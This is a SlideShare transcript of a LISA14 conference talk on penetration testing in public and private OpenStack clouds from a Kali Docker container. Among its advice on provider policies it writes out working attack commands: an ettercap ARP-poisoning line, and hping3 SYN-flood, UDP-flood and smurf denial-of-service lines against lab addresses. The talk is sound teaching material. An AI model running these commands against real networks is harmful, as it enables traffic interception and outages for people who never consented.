SlideShare a Scribd company logo

Lisa14

Dan Lambright
Dan Lambright

Penetration testing in the cloud can be conducted on public, private (owner), and private (tenant) clouds. Some key challenges include that cloud service providers have strong security but guests are responsible for their own protection, and penetration tests cannot affect other tenants. For private clouds, spoofing, port scanning, man-in-the-middle attacks, and denial-of-service attacks are possible risks. Commercial tools and policies from cloud service providers can aid in conducting safe and effective penetration tests in the cloud.

Software
1 of 24
Download to read offline
1 Penetration Testing in the Cloud Dan Lambright LISA14
2 Agenda ● Explore penetration testing on.. ● Public cloud ● Private cloud (owner) ● Private cloud (tenant)
3 Penetration Testing ● “Wargames” ● Mimic real attacks ● Test IDS/firewall detection ● Test security ● How ● Typically simulate attacks in a “safe” environment ● Or, attack actual machines ● Use special software, e.g. Nessus, metasploit, nmap..
4 Representative attacks spoofing Man in the middle Denial of service Port scans
5 Challenges on Cloud ● CSP have good security ● But, guests are your responsibility to protect ● Virtual ● No HW security appliances ● No low level access (grub) ● IP addresses may be ephermal ● Some pen tests could be expensive ● Penetration tests cannot affect others
6 Private Cloud Security ● Can't attack from cloud with spoofed source address ● Infrastructure resilient to DDOS (LOTS of bandwidth) ● Cannot sniff other tenant's traffic ● You could be attacked by any of.. ● Spoofing, portscan, MITM, DOS
7 Screenshot of break-in attempts AWS ●
8 Policies For Penetration Tests ● Most CSP will grant permission for a window of time ● No DOS tests ● No tests on instances that share physical network ● on AWS cannot use m1.small or t1.micro ● Some CSP have slow responses to requests
9 Commercial Tools ● CloudInspect ● On-demand pen tests ● DDOS sinks – Prolexic ● AlertLogic ● 24/7 response
PRIVATE CLOUD ADMINISTRATOR
11 Per instance vulnerability tests ● Do not wish to affect other instances ● Want to observe an instance's traffic ● Run an IDS against a particular instance
12 Openstack plumbing
13 Bridges Bonding? No, do not want to Modify Can tap the interface with snort (run multiple snorts on host?) Could rate limit interfaces on bridges Openstack allows rate limits or absolute limits on accounts Tc – traffic shaper
TENANT
15 Private Cloud Tenant ● Suppose wish to avoid network traffic ● How about attack from a container? ● IP address, MTU ● NAT for external connections ● “Ceiling” on container resources ● No “floor” / minimal guaranteed resources ● Skips external firewall !
16 Set up ● Kali – popular penetration ● testing distro ● Debian on red hat – ● 10.x.x.x subnet ● Import files (eg pcap) docker bridge V kali container instance V V qbr.. sudo docker run --privileged pandrew/kali /bin/bash
17 Port Scans ● nmap ● Network discovery tool ● Create “map” of network Examples nmap –sX (Xmas scan) nmap –sN (Null scan) nmap –sA (ACK scan)
18 Spoofing ● hping3 ● Examples nmap –sX (Xmas scan) nmap –sN (Null scan) nmap –sA (ACK scan)
19 Man in the Middle ● Ettercap ● Two machines, each with IP address ● Poison ARP table ● Simulate victim and middleman Examples apt-get install ettercap-text-only ettercap -T -M ARP -j /tmp/hosts.txt -F html.ef /172.17.0.26/ //
20 Denial of Service ● Hping3 from docker container ● Cannot stress system SYN attack to port 22 hping3 -c 10000 -d 120 -S -w 64 -p 22 --flood --rand-source -i eth0 172.17.42.1 lage UDP packets ●hping3 --rand-source --udp --flood -d 8192 172.17.42.1 Smurf sudo sysctl -w net.ipv4.icmp_echo_ignore_broadcasts=0 ●hping3 -1 --flood -a 172.17.0.23 172.17.255.255 ●Max bandwidth test... ●DDOS
21 Other ● Metasploit ● Curl command (ex. shellshocked) ● Lynx (html), but not limited to CLI..
22 Summary ● Cloud penetration testing is possible ● Coordinate with CSP ●
RED HAT CONFIDENTIAL – DO NOT DISTRIBUTE Thank You! ● dlambright@redhat.com ● henry_lambright@uml.edu
24 Still Need Penetration Tests ● Port scans are not (necessarily) blocked

Recommended

Hacking Blind
Hacking BlindHacking Blind
Hacking Blind
NikitaAndhale
 
Appsecforum2014 nov14-bk-cryptool-rump
Appsecforum2014 nov14-bk-cryptool-rumpAppsecforum2014 nov14-bk-cryptool-rump
Appsecforum2014 nov14-bk-cryptool-rump
Cyber Security Alliance
 
Scapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stackScapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stack
Alexandre Moneger
 
Tomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNSTomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNSDefconRussia
 
Workshop@naha_val3
Workshop@naha_val3Workshop@naha_val3
Workshop@naha_val3Shusaku Fukumine
 
Nmap for Scriptors
Nmap for ScriptorsNmap for Scriptors
Nmap for Scriptors
n|u - The Open Security Community
 
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
PROIDEA
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Bishop Fox
 

Recommended

Hacking Blind
Hacking BlindHacking Blind
Hacking Blind
NikitaAndhale
 
Appsecforum2014 nov14-bk-cryptool-rump
Appsecforum2014 nov14-bk-cryptool-rumpAppsecforum2014 nov14-bk-cryptool-rump
Appsecforum2014 nov14-bk-cryptool-rump
Cyber Security Alliance
 
Scapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stackScapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stack
Alexandre Moneger
 
Tomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNSTomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNSDefconRussia
 
Workshop@naha_val3
Workshop@naha_val3Workshop@naha_val3
Workshop@naha_val3Shusaku Fukumine
 
Nmap for Scriptors
Nmap for ScriptorsNmap for Scriptors
Nmap for Scriptors
n|u - The Open Security Community
 
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
PROIDEA
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Bishop Fox
 
Pentesting custom TLS stacks
Pentesting custom TLS stacksPentesting custom TLS stacks
Pentesting custom TLS stacks
Alexandre Moneger
 
Mitigating DNS Amplification Attacks At The DNS Server Using BGP AS Paths and...
Mitigating DNS Amplification Attacks At The DNS Server Using BGP AS Paths and...Mitigating DNS Amplification Attacks At The DNS Server Using BGP AS Paths and...
Mitigating DNS Amplification Attacks At The DNS Server Using BGP AS Paths and...
FrancisJeremiah1
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
egypt
 
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
Alexandre Moneger
 
Enumeration
EnumerationEnumeration
Enumeration
UTD Computer Security Group
 
Nmap
NmapNmap
Nmap
NishaYadav177
 
Security Onion Advance
Security Onion AdvanceSecurity Onion Advance
Security Onion Advance
Kaustubh Padwad
 
Solidity intro
Solidity introSolidity intro
Solidity intro
Angello Pozo
 
Velocity 2011 - Our first DDoS attack
Velocity 2011 - Our first DDoS attackVelocity 2011 - Our first DDoS attack
Velocity 2011 - Our first DDoS attack
Cosimo Streppone
 
Penetration Testing Resource Guide
Penetration Testing Resource Guide Penetration Testing Resource Guide
Penetration Testing Resource Guide
Bishop Fox
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Redspin, Inc.
 
Non-DIY* Logging
Non-DIY* LoggingNon-DIY* Logging
Non-DIY* Logging
ESUG
 
Node in Real Time - The Beginning
Node in Real Time - The BeginningNode in Real Time - The Beginning
Node in Real Time - The Beginning
Axilis
 
Port scanning
Port scanningPort scanning
Port scanning
Hemanth Pasumarthi
 
Nous Sommes Cyber - HTB Blue
Nous Sommes Cyber - HTB BlueNous Sommes Cyber - HTB Blue
Nous Sommes Cyber - HTB Blue
DianaWhitney4
 
We shall play a game....
We shall play a game....We shall play a game....
We shall play a game....
Sadia Textile
 
Nmap scripting engine
Nmap scripting engineNmap scripting engine
Nmap scripting engine
n|u - The Open Security Community
 
BSides Ottawa 2019 - HTB Blue
BSides Ottawa 2019 - HTB BlueBSides Ottawa 2019 - HTB Blue
BSides Ottawa 2019 - HTB Blue
DianaWhitney4
 
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CanSecWest
 
Cloud_Security_Final
Cloud_Security_FinalCloud_Security_Final
Cloud_Security_FinalBhavin Shah
 
Open Source Private Cloud Management with OpenStack and Security Evaluation w...
Open Source Private Cloud Management with OpenStack and Security Evaluation w...Open Source Private Cloud Management with OpenStack and Security Evaluation w...
Open Source Private Cloud Management with OpenStack and Security Evaluation w...
XHANI TRUNGU
 
Intrusion Detection Systems and Intrusion Prevention Systems
Intrusion Detection Systems and Intrusion Prevention Systems Intrusion Detection Systems and Intrusion Prevention Systems
Intrusion Detection Systems and Intrusion Prevention Systems
Cleverence Kombe
 

More Related Content

What's hot

Pentesting custom TLS stacks
Pentesting custom TLS stacksPentesting custom TLS stacks
Pentesting custom TLS stacks
Alexandre Moneger
 
Mitigating DNS Amplification Attacks At The DNS Server Using BGP AS Paths and...
Mitigating DNS Amplification Attacks At The DNS Server Using BGP AS Paths and...Mitigating DNS Amplification Attacks At The DNS Server Using BGP AS Paths and...
Mitigating DNS Amplification Attacks At The DNS Server Using BGP AS Paths and...
FrancisJeremiah1
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
egypt
 
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
Alexandre Moneger
 
Enumeration
EnumerationEnumeration
Enumeration
UTD Computer Security Group
 
Nmap
NmapNmap
Nmap
NishaYadav177
 
Security Onion Advance
Security Onion AdvanceSecurity Onion Advance
Security Onion Advance
Kaustubh Padwad
 
Solidity intro
Solidity introSolidity intro
Solidity intro
Angello Pozo
 
Velocity 2011 - Our first DDoS attack
Velocity 2011 - Our first DDoS attackVelocity 2011 - Our first DDoS attack
Velocity 2011 - Our first DDoS attack
Cosimo Streppone
 
Penetration Testing Resource Guide
Penetration Testing Resource Guide Penetration Testing Resource Guide
Penetration Testing Resource Guide
Bishop Fox
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Redspin, Inc.
 
Non-DIY* Logging
Non-DIY* LoggingNon-DIY* Logging
Non-DIY* Logging
ESUG
 
Node in Real Time - The Beginning
Node in Real Time - The BeginningNode in Real Time - The Beginning
Node in Real Time - The Beginning
Axilis
 
Port scanning
Port scanningPort scanning
Port scanning
Hemanth Pasumarthi
 
Nous Sommes Cyber - HTB Blue
Nous Sommes Cyber - HTB BlueNous Sommes Cyber - HTB Blue
Nous Sommes Cyber - HTB Blue
DianaWhitney4
 
We shall play a game....
We shall play a game....We shall play a game....
We shall play a game....
Sadia Textile
 
Nmap scripting engine
Nmap scripting engineNmap scripting engine
Nmap scripting engine
n|u - The Open Security Community
 
BSides Ottawa 2019 - HTB Blue
BSides Ottawa 2019 - HTB BlueBSides Ottawa 2019 - HTB Blue
BSides Ottawa 2019 - HTB Blue
DianaWhitney4
 
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CanSecWest
 

What's hot (19)

Pentesting custom TLS stacks
Pentesting custom TLS stacksPentesting custom TLS stacks
Pentesting custom TLS stacks
 
Mitigating DNS Amplification Attacks At The DNS Server Using BGP AS Paths and...
Mitigating DNS Amplification Attacks At The DNS Server Using BGP AS Paths and...Mitigating DNS Amplification Attacks At The DNS Server Using BGP AS Paths and...
Mitigating DNS Amplification Attacks At The DNS Server Using BGP AS Paths and...
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
 
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
 
Enumeration
EnumerationEnumeration
Enumeration
 
Nmap
NmapNmap
Nmap
 
Security Onion Advance
Security Onion AdvanceSecurity Onion Advance
Security Onion Advance
 
Solidity intro
Solidity introSolidity intro
Solidity intro
 
Velocity 2011 - Our first DDoS attack
Velocity 2011 - Our first DDoS attackVelocity 2011 - Our first DDoS attack
Velocity 2011 - Our first DDoS attack
 
Penetration Testing Resource Guide
Penetration Testing Resource Guide Penetration Testing Resource Guide
Penetration Testing Resource Guide
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
 
Non-DIY* Logging
Non-DIY* LoggingNon-DIY* Logging
Non-DIY* Logging
 
Node in Real Time - The Beginning
Node in Real Time - The BeginningNode in Real Time - The Beginning
Node in Real Time - The Beginning
 
Port scanning
Port scanningPort scanning
Port scanning
 
Nous Sommes Cyber - HTB Blue
Nous Sommes Cyber - HTB BlueNous Sommes Cyber - HTB Blue
Nous Sommes Cyber - HTB Blue
 
We shall play a game....
We shall play a game....We shall play a game....
We shall play a game....
 
Nmap scripting engine
Nmap scripting engineNmap scripting engine
Nmap scripting engine
 
BSides Ottawa 2019 - HTB Blue
BSides Ottawa 2019 - HTB BlueBSides Ottawa 2019 - HTB Blue
BSides Ottawa 2019 - HTB Blue
 
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
 

Viewers also liked

Cloud_Security_Final
Cloud_Security_FinalCloud_Security_Final
Cloud_Security_FinalBhavin Shah
 
Open Source Private Cloud Management with OpenStack and Security Evaluation w...
Open Source Private Cloud Management with OpenStack and Security Evaluation w...Open Source Private Cloud Management with OpenStack and Security Evaluation w...
Open Source Private Cloud Management with OpenStack and Security Evaluation w...
XHANI TRUNGU
 
Intrusion Detection Systems and Intrusion Prevention Systems
Intrusion Detection Systems and Intrusion Prevention Systems Intrusion Detection Systems and Intrusion Prevention Systems
Intrusion Detection Systems and Intrusion Prevention Systems
Cleverence Kombe
 
Александр Гладыш — Lua
Александр Гладыш — LuaАлександр Гладыш — Lua
Александр Гладыш — Lua
Yury Yurevich
 
Netcat - 101 Swiss Army Knife
Netcat - 101 Swiss Army KnifeNetcat - 101 Swiss Army Knife
Netcat - 101 Swiss Army Knife
n|u - The Open Security Community
 
Regulamento açoriano
Regulamento açorianoRegulamento açoriano
Regulamento açoriano
diario_catarinense
 
VDC - Best Practices der Kooperation im Netzwerk
VDC - Best Practices der Kooperation im NetzwerkVDC - Best Practices der Kooperation im Netzwerk
VDC - Best Practices der Kooperation im Netzwerk
Virtual Dimension Center (VDC) Fellbach
 
Free Alphabet Poster - 8 pages
Free Alphabet Poster - 8 pagesFree Alphabet Poster - 8 pages
Free Alphabet Poster - 8 pages
K-3TeacherResources Cox
 
Introductie Web 2.0 (FARO)
Introductie Web 2.0 (FARO)Introductie Web 2.0 (FARO)
Introductie Web 2.0 (FARO)
FARO
 
[Mobile Day HCM] Lessons Learn from Top Mobile App in Vietnam
[Mobile Day HCM] Lessons Learn from Top Mobile App in Vietnam[Mobile Day HCM] Lessons Learn from Top Mobile App in Vietnam
[Mobile Day HCM] Lessons Learn from Top Mobile App in VietnamAppota Group
 
A Mayoral Manifesto for the Digital Economy
A Mayoral Manifesto for the Digital EconomyA Mayoral Manifesto for the Digital Economy
A Mayoral Manifesto for the Digital Economy
London Assembly
 
Using Change Management to Transform Your Library Workshop
Using Change Management to Transform Your Library WorkshopUsing Change Management to Transform Your Library Workshop
Using Change Management to Transform Your Library Workshop
ALATechSource
 
EASA Eerste Uitbreiding 2012
EASA Eerste Uitbreiding 2012EASA Eerste Uitbreiding 2012
EASA Eerste Uitbreiding 2012
carelwassink
 
Automating things using selenium
Automating things using seleniumAutomating things using selenium
Automating things using selenium
Vengat Vasanth
 

Viewers also liked (18)

Cloud_Security_Final
Cloud_Security_FinalCloud_Security_Final
Cloud_Security_Final
 
Open Source Private Cloud Management with OpenStack and Security Evaluation w...
Open Source Private Cloud Management with OpenStack and Security Evaluation w...Open Source Private Cloud Management with OpenStack and Security Evaluation w...
Open Source Private Cloud Management with OpenStack and Security Evaluation w...
 
Intrusion Detection Systems and Intrusion Prevention Systems
Intrusion Detection Systems and Intrusion Prevention Systems Intrusion Detection Systems and Intrusion Prevention Systems
Intrusion Detection Systems and Intrusion Prevention Systems
 
8023 r
8023 r8023 r
8023 r
 
Александр Гладыш — Lua
Александр Гладыш — LuaАлександр Гладыш — Lua
Александр Гладыш — Lua
 
Netcat - 101 Swiss Army Knife
Netcat - 101 Swiss Army KnifeNetcat - 101 Swiss Army Knife
Netcat - 101 Swiss Army Knife
 
CV
CVCV
CV
 
Regulamento açoriano
Regulamento açorianoRegulamento açoriano
Regulamento açoriano
 
VDC - Best Practices der Kooperation im Netzwerk
VDC - Best Practices der Kooperation im NetzwerkVDC - Best Practices der Kooperation im Netzwerk
VDC - Best Practices der Kooperation im Netzwerk
 
Aboyagirl
AboyagirlAboyagirl
Aboyagirl
 
Free Alphabet Poster - 8 pages
Free Alphabet Poster - 8 pagesFree Alphabet Poster - 8 pages
Free Alphabet Poster - 8 pages
 
Introductie Web 2.0 (FARO)
Introductie Web 2.0 (FARO)Introductie Web 2.0 (FARO)
Introductie Web 2.0 (FARO)
 
[Mobile Day HCM] Lessons Learn from Top Mobile App in Vietnam
[Mobile Day HCM] Lessons Learn from Top Mobile App in Vietnam[Mobile Day HCM] Lessons Learn from Top Mobile App in Vietnam
[Mobile Day HCM] Lessons Learn from Top Mobile App in Vietnam
 
A Mayoral Manifesto for the Digital Economy
A Mayoral Manifesto for the Digital EconomyA Mayoral Manifesto for the Digital Economy
A Mayoral Manifesto for the Digital Economy
 
Using Change Management to Transform Your Library Workshop
Using Change Management to Transform Your Library WorkshopUsing Change Management to Transform Your Library Workshop
Using Change Management to Transform Your Library Workshop
 
EASA Eerste Uitbreiding 2012
EASA Eerste Uitbreiding 2012EASA Eerste Uitbreiding 2012
EASA Eerste Uitbreiding 2012
 
Zolotoy aktiv1
Zolotoy aktiv1Zolotoy aktiv1
Zolotoy aktiv1
 
Automating things using selenium
Automating things using seleniumAutomating things using selenium
Automating things using selenium
 

Similar to Lisa14

Comprehensive guide for compromising network devices.
Comprehensive guide for compromising network devices.Comprehensive guide for compromising network devices.
Comprehensive guide for compromising network devices.
Sri Manakula Vinayagar Engineering College
 
Ple18 web-security-david-busby
Ple18 web-security-david-busbyPle18 web-security-david-busby
Ple18 web-security-david-busby
David Busby, CISSP
 
Black hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBlack hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBakry3
 
Lightweight Virtualization with Linux Containers and Docker | YaC 2013
Lightweight Virtualization with Linux Containers and Docker | YaC 2013Lightweight Virtualization with Linux Containers and Docker | YaC 2013
Lightweight Virtualization with Linux Containers and Docker | YaC 2013
dotCloud
 
Lightweight Virtualization with Linux Containers and Docker I YaC 2013
Lightweight Virtualization with Linux Containers and Docker I YaC 2013Lightweight Virtualization with Linux Containers and Docker I YaC 2013
Lightweight Virtualization with Linux Containers and Docker I YaC 2013Docker, Inc.
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port Scanning
Sam Bowne
 
CurveZMQ, ZMTP and other Dubious Characters
CurveZMQ, ZMTP and other Dubious CharactersCurveZMQ, ZMTP and other Dubious Characters
CurveZMQ, ZMTP and other Dubious Characters
pieterh
 
"Lightweight Virtualization with Linux Containers and Docker". Jerome Petazzo...
"Lightweight Virtualization with Linux Containers and Docker". Jerome Petazzo..."Lightweight Virtualization with Linux Containers and Docker". Jerome Petazzo...
"Lightweight Virtualization with Linux Containers and Docker". Jerome Petazzo...
Yandex
 
RAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial TradecraftRAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial Tradecraft
⭕Alexander Rymdeko-Harvey
 
25 years of firewalls and network filtering - From antiquity to the cloud
25 years of firewalls and network filtering - From antiquity to the cloud25 years of firewalls and network filtering - From antiquity to the cloud
25 years of firewalls and network filtering - From antiquity to the cloud
shira koper
 
DOST: Ceph in a security critical OpenStack cloud
DOST: Ceph in a security critical OpenStack cloudDOST: Ceph in a security critical OpenStack cloud
DOST: Ceph in a security critical OpenStack cloud
Danny Al-Gaaf
 
Hacktivity2014: Virtual Machine Introspection to Detect and Protect
Hacktivity2014: Virtual Machine Introspection to Detect and ProtectHacktivity2014: Virtual Machine Introspection to Detect and Protect
Hacktivity2014: Virtual Machine Introspection to Detect and Protect
Tamas K Lengyel
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.ppt
cemporku
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdf
tehkotak4
 
Proof of x
Proof of xProof of x
Proof of x
Mikal Villa
 
IPv6 Security - Where is the Challenge?
IPv6 Security - Where is the Challenge?IPv6 Security - Where is the Challenge?
IPv6 Security - Where is the Challenge?
RIPE NCC
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?
IngridRivera36
 
0507 057 01 98 * Adana Klima Servisleri
0507 057 01 98 * Adana Klima Servisleri0507 057 01 98 * Adana Klima Servisleri
0507 057 01 98 * Adana Klima Servisleri
Adana Klima Servisi Bakım Montaj Taşıma Temizlik Tamir Arıza Teknik Servisleri
 
Shall we play a game
Shall we play a gameShall we play a game
Shall we play a game
jackpot201
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 

Similar to Lisa14 (20)

Comprehensive guide for compromising network devices.
Comprehensive guide for compromising network devices.Comprehensive guide for compromising network devices.
Comprehensive guide for compromising network devices.
 
Ple18 web-security-david-busby
Ple18 web-security-david-busbyPle18 web-security-david-busby
Ple18 web-security-david-busby
 
Black hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBlack hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slides
 
Lightweight Virtualization with Linux Containers and Docker | YaC 2013
Lightweight Virtualization with Linux Containers and Docker | YaC 2013Lightweight Virtualization with Linux Containers and Docker | YaC 2013
Lightweight Virtualization with Linux Containers and Docker | YaC 2013
 
Lightweight Virtualization with Linux Containers and Docker I YaC 2013
Lightweight Virtualization with Linux Containers and Docker I YaC 2013Lightweight Virtualization with Linux Containers and Docker I YaC 2013
Lightweight Virtualization with Linux Containers and Docker I YaC 2013
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port Scanning
 
CurveZMQ, ZMTP and other Dubious Characters
CurveZMQ, ZMTP and other Dubious CharactersCurveZMQ, ZMTP and other Dubious Characters
CurveZMQ, ZMTP and other Dubious Characters
 
"Lightweight Virtualization with Linux Containers and Docker". Jerome Petazzo...
"Lightweight Virtualization with Linux Containers and Docker". Jerome Petazzo..."Lightweight Virtualization with Linux Containers and Docker". Jerome Petazzo...
"Lightweight Virtualization with Linux Containers and Docker". Jerome Petazzo...
 
RAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial TradecraftRAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial Tradecraft
 
25 years of firewalls and network filtering - From antiquity to the cloud
25 years of firewalls and network filtering - From antiquity to the cloud25 years of firewalls and network filtering - From antiquity to the cloud
25 years of firewalls and network filtering - From antiquity to the cloud
 
DOST: Ceph in a security critical OpenStack cloud
DOST: Ceph in a security critical OpenStack cloudDOST: Ceph in a security critical OpenStack cloud
DOST: Ceph in a security critical OpenStack cloud
 
Hacktivity2014: Virtual Machine Introspection to Detect and Protect
Hacktivity2014: Virtual Machine Introspection to Detect and ProtectHacktivity2014: Virtual Machine Introspection to Detect and Protect
Hacktivity2014: Virtual Machine Introspection to Detect and Protect
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.ppt
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdf
 
Proof of x
Proof of xProof of x
Proof of x
 
IPv6 Security - Where is the Challenge?
IPv6 Security - Where is the Challenge?IPv6 Security - Where is the Challenge?
IPv6 Security - Where is the Challenge?
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?
 
0507 057 01 98 * Adana Klima Servisleri
0507 057 01 98 * Adana Klima Servisleri0507 057 01 98 * Adana Klima Servisleri
0507 057 01 98 * Adana Klima Servisleri
 
Shall we play a game
Shall we play a gameShall we play a game
Shall we play a game
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 

Recently uploaded

Advanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should KnowAdvanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should Know
Peter Caitens
 
Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024
Globus
 
Corporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMSCorporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMS
Tendenci - The Open Source AMS (Association Management Software)
 
Into the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdfInto the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdf
Ortus Solutions, Corp
 
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
Juraj Vysvader
 
Strategies for Successful Data Migration Tools.pptx
Strategies for Successful Data Migration Tools.pptxStrategies for Successful Data Migration Tools.pptx
Strategies for Successful Data Migration Tools.pptx
varshanayak241
 
SOCRadar Research Team: Latest Activities of IntelBroker
SOCRadar Research Team: Latest Activities of IntelBrokerSOCRadar Research Team: Latest Activities of IntelBroker
SOCRadar Research Team: Latest Activities of IntelBroker
SOCRadar
 
Designing for Privacy in Amazon Web Services
Designing for Privacy in Amazon Web ServicesDesigning for Privacy in Amazon Web Services
Designing for Privacy in Amazon Web Services
KrzysztofKkol1
 
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.ILBeyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Natan Silnitsky
 
A Comprehensive Look at Generative AI in Retail App Testing.pdf
